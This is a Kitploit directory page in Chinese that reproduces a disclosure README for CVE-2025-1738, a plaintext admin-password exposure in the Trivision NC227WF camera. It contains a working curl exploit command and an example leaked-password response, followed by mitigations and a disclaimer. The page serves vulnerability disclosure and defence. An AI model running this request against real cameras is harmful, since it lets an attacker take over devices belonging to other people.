Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-1738 — 0day 发现 CVE-2025-1738 | Kitploit
工具/GitHubGitHub/n0n4m3x41/cve-2025-1738
物联网安全密码攻击漏洞分析漏洞利用硬件与物联网安全学习与教育
GitHubn0n4m3x41/cve-2025-1738

CVE-2025-1738

0day 发现 CVE-2025-1738

查看仓库
35个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-1738 - Trivision 摄像头 NC227WF PoC

📋 概述

在负责任披露之后,分配了两个官方 CVE。

CVECVSS v3.1分数CWE类型
CVE-2025-1738AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N6.2CWE-598明文密码暴露

🔍 CVE-2025-1738 — 明文密码暴露 (CWE-598)

描述

任何本地用户无需事先认证即可检索到明文形式的管理员密码。

  • 攻击向量: 本地 (AV:L)
  • CVSS 分数: 6.2
  • CWE: CWE-598 (使用带有敏感查询字符串的 GET 请求方法)

载荷

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp

示例响应

图片
root@kitploit:~
...password=unguessable123!...

管理员密码以明文形式返回在响应体中。


🛡️ 缓解措施

  • 升级固件 如果 Trivision 提供了修补版本。
  • 隔离摄像头 在专用 VLAN 上,无外部访问。
  • 防火墙 限制摄像头管理端口访问来自不可信网段。
  • 更改默认凭据 并定期轮换密码。
  • 监控对 activex_pal.asp 和 mblogin.asp 的意外访问。

📚 参考

  • NVD — CVE-2025-1738
  • NVD — CVE-2025-1739

⚖️ 免责声明

本仓库仅用于教育和授权安全研究。作者不对任何滥用行为负责。在测试任何设备前务必获得明确许可。

下载工具